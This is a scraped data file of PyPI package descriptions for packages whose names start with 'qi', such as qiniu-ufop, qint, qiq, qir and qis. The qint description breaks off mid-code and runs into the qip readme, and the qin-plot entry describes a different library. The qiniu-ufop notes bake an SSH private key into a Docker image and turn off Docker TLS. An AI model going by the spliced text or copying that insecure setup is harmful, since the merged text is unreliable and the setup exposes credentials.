--debug\nqiniu-ufop runworker\u8bbf\u95eePOSThttp://localhost:9100/handler?cmd=\\&url=\u6216\u5c06\u6587\u4ef6\u4f5c\u4e3abody,POST\u5230POSThttp://localhost:9100/handler?cmd=\\\u6ce8\u610f: \u4e0d\u662f\u4f7f\u7528multipart/formdata\u8fdb\u884c\u6587\u4ef6\u4e0a\u4f20\u6ce8\u610f: \u5728windows\u4e0b\u5f00\u53d1\u9700\u989d\u5916\u5b89\u88c5eventlet,\u8fd0\u884crunworker\u65f6\u4f7f\u7528\u547d\u4ee4qiniu-ufop runworker -P eventlet\u5426\u5219\u4f1a\u62a5ValueError: not enough values to unpack (expected 3, got 0)\u672c\u5730\u8c03\u8bd5Docker\u5728\u9879\u76ee\u76ee\u5f55\u4e0bqiniu-ufop dockerfile > Dockerfile\ndocker pull ubuntu:18.04\ndocker build . -t \ndocker run --name -p 9100:9100 -t \u8bbf\u95eePOSThttp://localhost:9100/handler?cmd=\\\u6ce8\u610f: \u5728\u4f7f\u7528virtualbox\u65f6 localhost\u5e94\u6539\u4e3a\u865a\u62df\u673aip\u95ee\u9898\u6392\u67e5\u65e5\u5fd7\u67e5\u770b\u4e03\u725b\u7684\u65e5\u5fd7\u67e5\u770b\u597d\u50cf\u7ecf\u5e38\u53d6\u4e0d\u5230\u65e5\u5fd7,\u5efa\u8bae\u81ea\u884c\u5728\u5904\u7406\u7a0b\u5e8f\u4e2d\u57cb\u4e00\u4e2a\u4e0b\u8f7d\u65e5\u5fd7\u7684\u65b9\u6cd5,\u6765\u83b7\u53d6\u65e5\u5fd7.\u53ef\u4ee5\u53c2\u770b\u793a\u4f8b\u9879\u76ee\u90e8\u7f72\u8fc7\u7a0b\u4e2d\u9047\u5230\u7684\u5f02\u5e38\u5728\u8fd0\u884cqdoractl push\u65f6,\u53ef\u80fd\u4f1a\u9047\u5230\u8be5\u5f02\u5e38,\u53cd\u6b63\u6211\u662f\u9047\u5230\u4e86Get http://192.168.99.100:2376/v1.20/version: net/http: HTTP/1.x transport connection broken: malformed HTTP response \"\\x15\\x03\\x01\\x00\\x02\\x02\".\n\n* Are you trying to connect to a TLS-enabled daemon without TLS?\u9047\u5230\u4e0a\u8ff0\u5f02\u5e38,\u9996\u5148\u767b\u9646docker\u5bbf\u4e3b\u673adocker-machine ssh\u4fee\u6539docker\u914d\u7f6e,\u8bbe\u7f6eDOCKER_TLS=nosudo vi /var/lib/boot2docker/profile\u91cd\u542fdocker\u670d\u52a1sudo /etc/init.d/docker restart\u9000\u51fadocker\u5bbf\u4e3b\u673aexitunset\u672c\u673a\u73af\u5883\u53d8\u91cfDOCKER_TLS_VERIFY(\u4ee5windows\u4e3a\u4f8b)set DOCKER_TLS_VERIFY=\u518d\u5ea6\u6267\u884c\u90e8\u7f72(\u53c2\u89c1\u624b\u5de5\u90e8\u7f72\u6216\u4e00\u952e\u90e8\u7f72)Cookbook\u4f7f\u7528git\u66f4\u65b0\u4ee3\u7801\u5728\u5de5\u4f5c\u8def\u5f84\u4e0b,\u751f\u6210ssh-keymd .ssh\n ssh-keygen -f ./.ssh/id_rsa -t rsa -N ''\u5c06\u751f\u6210\u7684 ./.ssh/id_rsa.pub \u52a0\u5165git\u4ed3\u5e93\u7684\u90e8\u7f72\u5bc6\u94a5\u4e2d\u4fee\u6539Dockerfile,\u5728cmd\u524d\u52a0\u5165RUN apt-get install git\n ADD ./.ssh /root/.ssh\n RUN chmod 400 /root/.ssh/id_rsa\n RUN ssh-keyscan github.com >> /root/.ssh/known_hosts\n RUN git clone your@repository\u4fee\u6539script.shgit pull origin master\u6ce8\u610f: \u7531\u4e8e\u5c06\u79c1\u94a5\u52a0\u5165\u4e86\u955c\u50cf,\u4efb\u4f55\u62ff\u5230\u4f60\u7684\u955c\u50cf\u7684\u7528\u6237,\u5c06\u53ef\u4ee5\u83b7\u53d6\u5230\u4f60\u7684\u79c1\u94a5TODOS:\u5f02\u5e38\u5904\u7406\u5355\u5143\u6d4b\u8bd5\u6d4b\u8bd5\u5f02\u6b65\u5410\u69fd\u4e00\u4e0b\u4e03\u725b\u7684\u5de5\u5355\u5904\u7406,\u6211\u63d0\u4e86\u81f3\u5c113\u4e2abug,\u8981\u4e48\u88c5\u50bb,\u8981\u4e48\u8bf4\u5bf9\u4e0d\u8d77,\u6211\u4eec\u6709\u95ee\u9898,\u8bf7\u4f60\u4f7f\u7528\u5176\u4ed6\u65b9\u6cd5...\u53e6\u5916\u6587\u6863\u81ea\u5b9a\u4e49\u6570\u636e\u5904\u7406\u8fd9\u5757\u6587\u6863\u4e5f\u6bd4\u8f83\u7cdf\u7cd5.\u6709\u95ee\u9898\u53ef\u4ee5\u63d0issue\u6211\u95ee\u6211,star\u6570\u4e0a50\u518d\u8003\u8651\u5355\u5143\u6d4b\u8bd5\u5427~Xavier-Lam@NetDragon"} +{"package": "qiniu_upload", "pacakge-description": "UNKNOWN"} +{"package": "qinling", "pacakge-description": "NoteQinling (is pronounced \u201ctchinling\u201d) refers to Qinling Mountains in southern\nShaanxi Province in China. The mountains provide a natural boundary between\nNorth and South China and support a huge variety of plant and wildlife, some\nof which is found nowhere else on Earth.Qinling is Function as a Service for OpenStack. This project aims to provide a\nplatform to support serverless functions (like AWS Lambda). Qinling supports\ndifferent container orchestration platforms (Kubernetes/Swarm, etc.) and\ndifferent function package storage backends (local/Swift/S3) by nature using\nplugin mechanism.Free software: under theApache licenseDocumentation:https://docs.openstack.org/qinling/latest/Source:https://opendev.org/openstack/qinlingFeatures:https://storyboard.openstack.org/#!/project/927Bug Track:https://storyboard.openstack.org/#!/project/927Release notes:https://docs.openstack.org/releasenotes/qinling/IRC channel on Freenode: #openstack-qinling"} +{"package": "qinling-dashboard", "pacakge-description": "Qinling dashboard is a horizon plugin for Qinling.License: Apache licenseDocumentation:https://docs.openstack.org/qinling-dashboard/latest/Source:https://git.openstack.org/cgit/openstack/qinling-dashboardBugs:https://bugs.launchpad.net/qinling-dashboardTeam and repository tags"} +{"package": "qin-plot", "pacakge-description": "Pymatsci(Python Materials Science) is a robust, open-source Python library for materials analysis. It is further packaged and developed on the basis ofPymatgen, a very powerful package of material analysis. Pymatsci is dedicated to quick and easy operations, so that people can get the results they want without taking too much time.\nMore detailed information can refer to thewiki."} +{"package": "qinst", "pacakge-description": "Quantum Experiments Drivers"} +{"package": "qint", "pacakge-description": "Quantized Integer Operations (QInt) LibraryThe Quantized Integer Operations (QInt) library is a Python package for performing arithmetic operations on quantized integers. It allows for exact arithmetic calculations while working with numbers that have been quantized for precision. This library is particularly useful when dealing with numerical computations that require high precision.AboutQuantized Integers (QInt) are a specialized numeric data type that represents integers with a defined level of precision. In simple terms, a quantized integer consists of two components:Value: This is the integer value you want to represent.Precision: This is the number of decimal places to which the integer value is quantized.\nFor example, if you have a value of 123 and a precision of 2, it means that you are representing the number 123 as 1.23 with two decimal places of precision. Quantized integers allow you to work with exact fractional values while maintaining control over precision.Why are Quantized Integers Important?1. Precision ControlQuantized integers provide precise control over the level of precision in numeric calculations. In contrast to floating-point numbers, which have limited precision and may introduce rounding errors, quantized integers enable exact arithmetic operations. This makes them essential for applications where precision is critical, such as financial calculations, scientific simulations, and engineering designs.2. Avoiding Floating-Point ErrorsFloating-point arithmetic in traditional programming languages (e.g., Python's float) can result in unexpected errors due to the inherent limitations of floating-point representations. Quantized integers eliminate these errors by representing values as scaled integers, ensuring that calculations are performed exactly as intended.3. Deterministic ResultsQuantized integers offer deterministic results in computations. This means that the same operations performed on quantized integers will always yield the same results, regardless of the platform or environment. This determinism is crucial in applications like cryptography, where consistent results are essential.4. Compatibility with Integer OperationsDespite their fractional representation, quantized integers can seamlessly interact with regular integer operations, making them versatile for various use cases. You can add, subtract, multiply, divide, and perform other standard mathematical operations on quantized integers just like regular integers.When Should I Use Quantized Integers?Quantized integers are particularly valuable in scenarios where precision matters and floating-point inaccuracies can lead to significant problems. Consider using quantized integers in the following situations:Financial Calculations: Precise monetary calculations require exact representation of decimal values to avoid rounding errors.Scientific Research: In scientific simulations and experiments, maintaining precision is crucial for accurate results.Control Systems: Systems that rely on precise numeric values, such as robotics and automation, benefit from deterministic calculations.Cryptography: Cryptographic algorithms demand exact results to ensure the security and reliability of the system.InstallationYou can install the library using pip like so:pipinstallqintUsageTo use the QInt library, you first need to import the necessary modules:fromqintimportqintCreating a Quantized IntegerYou can create a quantized integer using the QInt class. Quantized integers are represented by two attributes: value and precision, where value is the quantized integer value and precision is the precision of the quantized value.# Create a QInt with a value of 123 and precision of 2qint=QInt(123,2)If you instead want to create a QInt based on an actual float or integer value at a given precision, instead call the static create method:# Create a QInt with a value of 147 and a precision of 2qint=QInt.create(1.47,2)Arithmetic OperationsQInt supports various arithmetic operations, including addition, subtraction, multiplication, division, and more.\nIt is worth noting that addition and subtraction can be performed either with another QInt, or with an integer. If done with an integer, it is treated with the implied precision. For example:q1=QInt.create(4.00,2)q2=QInt.create(4.00,2)q3=q1+q2# QInt(800, 2)q4=q1+4# QInt(800, 2)In addition to integers and QInts, multiplication and division can also be performed with pythonFractionobjects (from the standardfractionslibrary):fromfractionsimportFractionq1=QInt.create(4.00,2)q2=QInt.create(4.00,2)q3=q1+q2# QInt(1600, 2)q4=q1*4# QInt(1600, 2)q5=q1*Fraction(1,2)# QInt(200, 2)Comparison OperationsYou can also compare QInt instances using standard comparison operators like ==, !=, <, <=, >, and >=.qint1=QInt(100,2)qint2=QInt(200,2)ifqint1>>qipinstallscipyinfo:Requested'scipy'info:Installed'scipy-1.5.2'.info:Wizdefinitioncreatedfor'scipy-1.5.2'.info:Requested'numpy>=1.14.5'[from'scipy-1.5.2'].info:Installed'numpy-1.19.2'.info:Wizdefinitioncreatedfor'numpy-1.19.2'.info:Packagesinstalled:numpy-1.19.2,scipy-1.5.2info:Packageoutputdirectory:'/tmp/qip/packages'info:Definitionoutputdirectory:'/tmp/qip/definitions'AWizdefinition is created\nfor each package installed in order to safely use it within a protected\nenvironment.>>>wiz-add/tmp/qip/definitionsusescipy--pythonDocumentationFull documentation, including installation and setup guides, can be found athttps://qip.readthedocs.io/en/stable/CopyrightCopyright (C) 2018, The MillThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU Lesser General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.This program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU Lesser General Public License for more details.You should have received a copy of the GNU Lesser General Public License\nalong with this program. If not, see ."} +{"package": "qipipe", "pacakge-description": "Quantitative Imaging pipeline. See thedocumentationfor more information."} +{"package": "qiplot", "pacakge-description": "Checklist to update version on PyPi and Gitlab:edit codeedit setup.py (increase version number)cd to same level as setup.pypypipython -m buildtwine upload dist/* --skip-existinggitlabgit push"} +{"package": "qi.portlet.TagClouds", "pacakge-description": "Introductionqi.portlet.TagClouds is a plone product that adds tag cloud portlet support. The following parameters of the portlet are configurable through the web:portlet titlenumber of different tag sizesmaximum tags to showcontent types searched (optionally)tags (subjects) searched (optionally)section of the site to be searchedworkflow states searchedfiltering by keywords so that a tag cloud of all keywords that are combined\nwith the filter keywords is shownqi.portlet.TagClouds also comes with a simple caching mechanism. Cache remains\nvalid for a time interval that can be set in the portlet settings.Changelog1.35Update buildout.cfg to Plone 4.2, gitignore build products [gyst]Change import to work with Plone 4.1.x and Plone 4.2.x [lccruz]1.34Moved collective.testcaselayer from the install_requires to a \u2018test\u2019\nextras_require. [maurits]Do not require cmf.ManagePortal to add or edit the portlet [erral]1.33Enable (language-independent) content across multiple INavigationRoot\nFolders to be searched for tags [gyst]Change import of IVocabularyFactory in order to work with Plone 4.0.x and\nPlone 4.1.x [erico_andrei]Added Brazilian Portuguese translation [erico_andrei]1.32Removed the member id from the cache key in portlet. Credits to dimo for\nreporting. [ggozad]Switched to using native plone vocabulary for workflow states on portlet\nedit form. [piv]Remove old file structure now that everything moved to src/ subfolder.\n[kdeldycke]Added german translation [kiwisauce]1.31Fixed a case where the edit form is invoked and a previously selected\nkeyword does not exist anymore. [ggozad]Fixed cache key for multiple sites. Thanks to Guido Stevens [ggozad]Plone 4 compatibility. [ggozad]Moved to using collective.testcaselayer for testing. [ggozad]1.30The product is now accompanied with proper tests. [ggozad]Added filtering by keyword. Thanks to lzdych for the idea and\ndiscussions. [ggozad]All important parameters (workflow states, portal types and search path)\nare now present in the search links. [ggozad]Moved vocabularies. [ggozad]Removed the settings shouldRestrictBySubject and shouldRestrictByTypes.\nNow just using sane defaults. [ggozad]Modified the caching mechanism, so that it takes into account the portlet\nsettings. This ensures separate caching for separate portlets. [ggozad]Added the member in the portlet cache key. This will increase the\ncalculations necessary, but is important as it was possible to cache private\nobjects as well. [ggozad]Added the number of items found under the tag in thetitleof the links.\n[lzdych]Up french translation with new msgids. [toutpt]Add translation of workflow states vocabulary. [toutpt]1.21Fixed caching policy for multilingual sites, resolves: #2 [lzdych]Added quoting of tag links: fixes not working search by tags with special\nchars. [lzdych]Added czech translation. [lzdych]extended html markup to support rounded corners, resolves: #1. [lzdych]1.20Added french translation. [toutpt]1.11Added workflow states to the configuration options. [ggozad]Added maximum tags to display to the configuration options. [ggozad]1.1Added root folder to search under. [ggozad]1.0Initial release [ggozad]"} +{"package": "qipp", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qiprofile-rest", "pacakge-description": "qiprofileREST API.\nSee thedocumentationfor more information."} +{"package": "qiprofile-rest-client", "pacakge-description": "Displays the OHSU QIN images and annotations. See thedocumentationfor more information."} +{"package": "qipu", "pacakge-description": "Qipu: Market simulator served with the FIX protocol"} +{"package": "qipype", "pacakge-description": "Python wrappers for QUIT"} +{"package": "qiq", "pacakge-description": "qiq is the thin layer over pip with some principles.requirements.txt becomes qiq.txtvirtual environment created in project invenvevery package inqiq.txthas exact version or links to local directorycan make symlinks for local developmentNo requirements exceptPython 3.UsageFor exampleMy-Company-Coreis the Company's core library used almost in all projects. It's development files located relative to current project is../my_company_core.\nOurqiq.txtwill be:+dev:../my_company_core\nMy-Company-Core==1.2.7\nFlask==1.0.2\nflask-cors==3.0.7+devis the flag, which can be given inqiqcommand.\nThis will symlinkmy_company_coreto../my_company_core:qiq +devAnd this will install production use code to venv:qiqBy default used library name is last directory in path. It can be overriden with name and==:+dev:Company-Core==../my_company_coreVCS also supported:+dev:git+ssh://gitlab.com/myteam/mycompanycore.git@2313ceee"} +{"package": "qiqi20160209", "pacakge-description": "UNKNOWN"} +{"package": "qir", "pacakge-description": "Quantum Impurity RelaxometryMagnons are quanta of spin waves, which are modes of collectively precessing spins. Thermally excited magnons in thin magnetic films generate stray fields at the film surface which can be detected using quantum impurities such as nitrogen-vacancy (NV) centers. NVs are lattice defects in diamond and are able to couple with magnon stray fields. Assuming a thermal occupancy of magnon modes, we study the magnetization dynamics of the magnons propagating through thin magnetic insulators using the Landau-Lifshitz-Gilbert equation.We implement a numerical model to predict and understand the response of the NV center to proximal magnons in thin films. The simulation includes a static bias field in an arbitrary orientation with respect to the quantization axis of the NV center using the diamond\u2019s tetrahedral symmetry. This extended model is in demand due to limitations in present-day measurement techniques to align the bias field with an NV center. The code in this module is based on and an extension of the QIR theory presented in Rustagi et al. (2020) [1].InstallationRun the following to install this package:pipinstallqirUsageImport the Quantum Impurity Relaxometry (qir) module.fromqirimportRelaxationRate,ZFS,GAMMAImportnumpyrequired for matrix calculations.importnumpyasnpfromnumpyimportpi,linspace,empty_likeImportmatplotlibrequired for plotting.importmatplotlib.pyplotaspltimportmatplotlib.colorsascolorsCallRelaxationRateclass and choose parameters.B_ext=31e-3Gamma=RelaxationRate(bext=B_ext,quadrants=\"all\",zoom_in_heatmap=1.5,film_thickness=235e-9)Check the input arguments.Gamma.init_localsGet kx, ky meshgrids. Create integrand meshgrid corresponding to kx and ky.If creating high-res 2D meshgrid plots, use at leastx_pixels = 500andy_pixels = 500.If calculating rateGammavs fieldB_ext, usex_pixels = 200andy_pixels = 6000.Gamma.create_k_bounds()Gamma.create_k_meshgrids(x_pixels=1000,y_pixels=1000)Gamma.calculate_sum_di_dj_cij()Gamma.create_integrand_grid_exclude_nv_distance()Gamma.create_integrand_grid_include_nv_distance()Getk_x,k_yandGammaintegrand.X=Gamma.kx*1e-6/(2*pi)# 2D numpy array [1/um]Y=Gamma.ky*1e-6/(2*pi)# 2D numpy array [1/um]Z=Gamma.integrand_grid_include_nv_distance# 2D numpy array [rad Hz]Calculate minimum and maximum element inGammaintegrand array.vmin=np.amin(Z)vmax=np.amax(Z)Create a directory where you can save your plots in.path=\"plot-figures\"importos# create directory in current folderos.mkdir(path)ifnotos.path.exists(path)elseNonepath_txt=os.path.join(path,\"txt_files\")path_fig=os.path.join(path,\"figures\")os.mkdir(path_txt)ifnotos.path.exists(path_txt)elseNoneos.mkdir(path_fig)ifnotos.path.exists(path_fig)elseNoneprint(f\"Created:\\n\\t.{path_txt}\")print(f\"Created:\\n\\t.{path_fig}\")Save meshgrids in.txtfiles (optional).B=B_ext*1e4# external magnetic field [Gauss]path_txt_X=os.path.join(path,f\"heatmap_{B:.0f}G_X.txt\")path_txt_Y=os.path.join(path,f\"heatmap_{B:.0f}G_Y.txt\")path_txt_Z=os.path.join(path,f\"heatmap_{B:.0f}G_Z.txt\")np.savetxt(path_txt_X,X,header=f\"Meshgrid kx [1/um]; B_ext ={B:.0f}Gauss\")np.savetxt(path_txt_Y,Y,header=f\"Meshgrid ky [1/um]; B_ext ={B:.0f}Gauss\")np.savetxt(path_txt_Z,Z,header=f\"Log of Gamma integrand [Hz]; B_ext{B:.0f}Gauss\")print(f\"Saved in:\\n\\t{path_txt_X}\\n\\t{path_txt_Y}\\n\\t{path_txt_Z}\")Plot 2D heatmap ofGammaintegrand usingpyplot.pcolormeshinlog_10scale.fig1,ax1=plt.subplots(figsize=(18,8))ax1.set_xlabel(r\"$k_x/2\\mathregular{\\pi}$ (1/$\\mathregular{\\mu}$m)\",fontsize=18)ax1.set_ylabel(r\"$k_y/2\\mathregular{\\pi}$ (1/$\\mathregular{\\mu}$m)\",fontsize=18)im1=ax1.pcolormesh(X,Y,Z,cmap='jet',norm=colors.LogNorm(vmin=1e-11,vmax=vmax),shading=\"auto\")cbar1=fig1.colorbar(im1)cbar1.set_label(r\"$\\Delta k \\log_{10}(\\sum_{i,j} D_i D_j C_{ij})$\",fontsize=18)Save plot.path_to_file=os.path.join(path_fig,\"heatmap_logscale.png\")fig1.savefig(path_to_file)print(f\"Plot saved in:\\n\\t{path_to_file}\")Plot 2D heatmapGammaintegrand usingpyplot.pcolormeshin normal scale.fig2,ax2=plt.subplots(figsize=(18,8))ax2.set_xlabel(r\"$k_x/2\\mathregular{\\pi}$ (1/$\\mathregular{\\mu}$m)\",fontsize=18)ax2.set_ylabel(r\"$k_y/2\\mathregular{\\pi}$ (1/$\\mathregular{\\mu}$m)\",fontsize=18)im2=ax2.pcolormesh(X,Y,Z,cmap='jet',shading=\"auto\")cbar2=fig2.colorbar(im2)cbar2.set_label(r\"$\\Delta k \\log_{10}(\\sum_{i,j} D_i D_j C_{ij})$\",fontsize=18)Save plot.path_to_file=os.path.join(path_fig,\"heatmap_logscale.png\")fig2.savefig(path_to_file)print(f\"Plot saved in:\\n\\t{path_to_file}\")Relaxation rate as function of magnetic fieldCalculate the relaxation rateGamma[MHz] as function of the magnetic fieldB[Tesla].defget_rate_vs_field():x=linspace(1e-3,50e-3,25)y=empty_like(x)foriinrange(len(x)):rate=RelaxationRate(A_exchange=8.47e-12,distance_nv=40e-9,Gilbert_damping=50e-3,film_thickness=40e-9,M_saturation=324000,bext=x[i])rate.kx_min=-5e6*2*pirate.kx_max=5e6*2*pirate.ky_min=-2e6*2*pirate.ky_max=2e6*2*pirate.create_k_meshgrids(x_pixels=200,y_pixels=4000)rate.calculate_sum_di_dj_cij()rate.create_integrand_grid_exclude_nv_distance()rate.create_integrand_grid_include_nv_distance()y[i]=rate.rate_in_MHzreturnx,yPlotGammaas function ofB.B,rate=get_rate_vs_field()fig3,ax3=plt.subplots(figsize=(8,6))plt.plot(B,rate)plt.xlabel(\"B (Tesla)\")plt.ylabel(\"Rate (MHz)\")plt.show()QI distance dependencyCalculate relaxation rateGamma[MHz] as function of the distanced[m] between the quantum impurity (e.g. nitrogen-vacancy spin).defget_rate_vs_distance(B=25e-3):x=np.geomspace(50e-9,500e-9,100)y=np.empty_like(x)rate=RelaxationRate(bext=B)rate.create_k_bounds()rate.create_k_meshgrids(x_pixels=100,y_pixels=4000)rate.calculate_sum_di_dj_cij()rate.create_integrand_grid_exclude_nv_distance()foriinrange(len(x)):rate.distance_nv=x[i]rate.create_integrand_grid_include_nv_distance()y[i]=rate.rate_in_MHzreturnx,yPlotGamma[MHz] as function of distanced[meter].d,r=get_rate_vs_distance()plt.plot(d,r)plt.xlabel(\"Distance (m)\")plt.ylabel(\"Rate (MHz)\")plt.show()Spin-Wave Dispersion: DESWs and BVSWsCalculate the relaxation rate for film thickness 235 nm.Gamma1=RelaxationRate(film_thickness=235e-9)Get the wave numbers fromk=0tok=8*2\\pi[1/um].k=np.linspace(0,8e6*2*pi,10000)Calculate the Backward-Volume Spin Wave Dispersion (BVSW).# BVSW (ky=0)Gamma1.kx=kGamma1.ky=np.zeros_like(k)Gamma1.create_w_meshgrids()omega_bvsw=Gamma1.omega_spin_wave_dispersion()Calculate the Damon-Eschbach Spin Wave Dispersion (BVSW).# DESW (kx=0)Gamma1.ky=kGamma1.kx=np.zeros_like(k)Gamma1.create_w_meshgrids()omega_desw=Gamma1.omega_spin_wave_dispersion()Plot the frequencyf[GHz] as function of wave numberk[1/um].plt.figure(figsize=(8,6))plt.plot(k*1e-6/(2*pi),omega_desw*1e-9/(2*pi),label=\"DESW\",c='b')plt.plot(k*1e-6/(2*pi),omega_bvsw*1e-9/(2*pi),label=\"BVSW\",c='r')plt.xlabel(\"k (1/um)\")plt.ylabel(\"f (GHz)\")plt.legend()AuthorsDevelopers:Helena La(theory + code)Contributors:Brecht Simon(theory + code testing)Dr. Toeno van der Sar(theory)Dr. Samer Kurdi(theory)Bibliography[1] A. Rustagi, I. Bertelli, T. van der Sar, and P. Upadhyaya, 2020,https://doi.org/10.1103/PhysRevB.102.220403"} +{"package": "qirest", "pacakge-description": "qiprofileREST server.\nSee thedocumentationfor more information."} +{"package": "qirest-client", "pacakge-description": "qiprofile `_\nREST API.\nSee thedocumentationfor more information."} +{"package": "qirnn", "pacakge-description": "A novel architecture inspired by principles from quantum computing and neural networks."} +{"package": "qis", "pacakge-description": "Quantitative Investment Strategies: QISqis package implements analytics for visualisation of financial data, performance\nreporting, analysis of quantitative strategies.qis package is split into 5 main modules with the\ndependecy path increasing sequentially as follows.qis.utilsis module containing low level utilities for operations with pandas, numpy, and datetimes.qis.perfstatsis module for computing performance statistics and performance attribution including returns, volatilities, etc.qis.plotsis module for plotting and visualization apis.qis.modelsis module containing statistical models including filtering and regressions.qis.portfoliois high level module for analysis, simulation, backtesting, and reporting of quant strategies.qis.examplescontains scripts with illustrations of QIS analytics.Table of contentsAnalyticsInstallationExamplesVisualization of price dataMulti assets factsheetStrategy factsheetStrategy benchmark factsheetMulti strategy factsheetNotebooksContributionsUpdatesToDosDisclaimerUpdatesInstallationinstall usingpipinstallqisupgrade usingpipinstall--upgradeqisclose usinggitclonehttps://github.com/ArturSepp/QuantInvestStrats.gitCore dependencies:\npython = \">=3.8,<3.11\",\nnumba = \">=0.56.4\",\nnumpy = \">=1.22.4\",\nscipy = \">=1.10\",\nstatsmodels = \">=0.13.5\",\npandas = \">=1.5.2\",\nmatplotlib = \">=3.2.2\",\nseaborn = \">=0.12.2\"Optional dependencies:\nyfinance \">=0.1.38\" (for getting test price data),\npybloqs \">=1.2.13\" (for producing html and pdf factsheets)Examples1. Visualization of price dataThe script is located inqis.examples.performances(https://github.com/ArturSepp/QuantInvestStrats/blob/master/qis/examples/performances.py)importmatplotlib.pyplotaspltimportseabornassnsimportyfinanceasyfimportqis# define tickers and fetch price datatickers=['SPY','QQQ','EEM','TLT','IEF','SHY','LQD','HYG','GLD']prices=yf.download(tickers,start=None,end=None)['Adj Close'][tickers].dropna()# plotting price data with minimum usagewithsns.axes_style(\"darkgrid\"):fig,ax=plt.subplots(1,1,figsize=(10,7))qis.plot_prices(prices=prices,x_date_freq='A',ax=ax)# 2-axis plot with drawdowns using sns styleswithsns.axes_style(\"darkgrid\"):fig,axs=plt.subplots(2,1,figsize=(10,7))qis.plot_prices_with_dd(prices=prices,x_date_freq='A',axs=axs)# plot risk-adjusted performance table with excess Sharpe ratioust_3m_rate=yf.download('^IRX',start=None,end=None)['Adj Close'].dropna()/100.0# set parameters for computing performance stats including returns vols and regressionsperf_params=qis.PerfParams(freq='M',freq_reg='Q',alpha_an_factor=4.0,rates_data=ust_3m_rate)# perf_columns is list to display different perfomance metrics from enumeration PerfStatfig=qis.plot_ra_perf_table(prices=prices,perf_columns=[PerfStat.TOTAL_RETURN,PerfStat.PA_RETURN,PerfStat.PA_EXCESS_RETURN,PerfStat.VOL,PerfStat.SHARPE_RF0,PerfStat.SHARPE_EXCESS,PerfStat.SORTINO_RATIO,PerfStat.CALMAR_RATIO,PerfStat.MAX_DD,PerfStat.MAX_DD_VOL,PerfStat.SKEWNESS,PerfStat.KURTOSIS],title=f\"Risk-adjusted performance:{qis.get_time_period_label(prices,date_separator='-')}\",perf_params=perf_params)# add benchmark regression using excess returns for linear beta# regression frequency is specified using perf_params.freq_reg# regression alpha is multiplied using perf_params.alpha_an_factorfig=qis.plot_ra_perf_table_benchmark(prices=prices,benchmark='SPY',perf_columns=[PerfStat.TOTAL_RETURN,PerfStat.PA_RETURN,PerfStat.PA_EXCESS_RETURN,PerfStat.VOL,PerfStat.SHARPE_RF0,PerfStat.SHARPE_EXCESS,PerfStat.SORTINO_RATIO,PerfStat.CALMAR_RATIO,PerfStat.MAX_DD,PerfStat.MAX_DD_VOL,PerfStat.SKEWNESS,PerfStat.KURTOSIS,PerfStat.ALPHA_AN,PerfStat.BETA,PerfStat.R2],title=f\"Risk-adjusted performance:{qis.get_time_period_label(prices,date_separator='-')}benchmarked with SPY\",perf_params=perf_params)2. Multi assets factsheetThis report is adopted for reporting the risk-adjusted performance\nof several assets with the goal\nof cross-sectional comparisionRun example inqis.examples.factsheets.multi_assets.pyhttps://github.com/ArturSepp/QuantInvestStrats/blob/master/qis/examples/factsheets/multi_assets.py3. Strategy factsheetThis report is adopted for report performance, risk, and trading statistics\nfor either backtested or actual strategy\nwith strategy data passed as PortfolioData objectRun example inqis.examples.factsheets.strategy.pyhttps://github.com/ArturSepp/QuantInvestStrats/blob/master/qis/examples/factsheets/strategy.py4. Strategy benchmark factsheetThis report is adopted for report performance and marginal comparison\nof strategy vs a benchmark strategy\n(data for both are passed using individual PortfolioData object)Run example inqis.examples.factsheets.strategy_benchmark.pyhttps://github.com/ArturSepp/QuantInvestStrats/blob/master/qis/examples/factsheets/strategy_benchmark.py5. Multi strategy factsheetThis report is adopted to examine the sensitivity of\nbacktested strategy to a parameter or set of parameters:Run example inqis.examples.factsheets.multi_strategy.pyhttps://github.com/ArturSepp/QuantInvestStrats/blob/master/qis/examples/factsheets/multi_strategy.py6. NotebooksRecommended package to work with notebooks:pipinstallnotebookStarting local serverjupyternotebookContributionsIf you are interested in extending and improving QIS analytics,\nplease consider contributing to the library.I have found it is a good practice to isolate general purpose and low level analytics and visualizations, which can be outsourced and shared, while keeping\nthe focus on developing high level commercial applications.There are a number of requirements:The code isPep 8 compliantReliance on common Python data types including numpy arrays, pandas, and dataclasses.Transparent naming of functions and data types with enough comments. Type annotations of functions and arguments is a must.Each submodule has a unit test for core functions and a localised entry point to core functions.Avoid \"super\" pythonic constructions. Readability is the priority.Updates30 December 2022, Version 1.0.1 released08 July 2023, Version 2.0.1 releasedCore ChangesPortfolio optimization (qis.portfolio.optimisation) layer is removed with core\nfunctionality moved to a stand-alone Python package: Backtesting Optimal Portfolio (bop)This allows to remove the dependency from cvxpy and sklearn packages and\nthus to simplify the dependency management for qisAdded factsheet reporting using pybloqs packagehttps://github.com/man-group/PyBloqsPybloqs is a versatile tool to create customised reporting using Matplotlib figures and table\nand thus leveraging QIS visualisation analyticsNew factsheets are addedExamples are added for the four type of reports:multi assets: report performance of several assets with goal of cross-sectional comparision:\nsee qis.examples.factsheets.multi_asset.pystrategy: report performance, risk, and trading statictics for either backtested or actual strategy\nwith strategy data passed as PortfolioData object: see qis.examples.factsheets.strategy.pystrategy vs benchmark: report performance and marginal comparison\nof strategy vs a benchmark strategy (data for both are passed using individual PortfolioData object):\nsee qis.examples.factsheets.strategy_benchmark.pymulti_strategy: report for a list of strategies with individual PortfolioData. This report is\nuseful to examine the sensetivity of backtested strategy to a parameter or set of parameters:\nsee qis.examples.factsheets.multi_strategyToDosEnhanced documentation and readme examples.Docstrings for key functions.Reporting analytics and factsheets generation enhancing to matplotlib.DisclaimerQIS package is distributed FREE & WITHOUT ANY WARRANTY under the GNU GENERAL PUBLIC LICENSE.See theLICENSE.txtin the release for details.Please report any bugs or suggestions by opening anissue."} +{"package": "qisa", "pacakge-description": "qISAqISA is an extended ISA data model with enhanced quality assurance layer. This tool provides a command line UI and user-friendly GUI."} +{"package": "qiscusapi", "pacakge-description": "No description available on PyPI."} +{"package": "qiscus-sdk", "pacakge-description": "Qiscus SDK WrapperPython version of Qiscus SDK wrapperFree software: MIT licenseDocumentation:https://qiscus-sdk.readthedocs.io.FeaturesTODOCreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.0.1 (2017-06-07)First release on PyPI."} +{"package": "qishi_dogs", "pacakge-description": "readme"} +{"package": 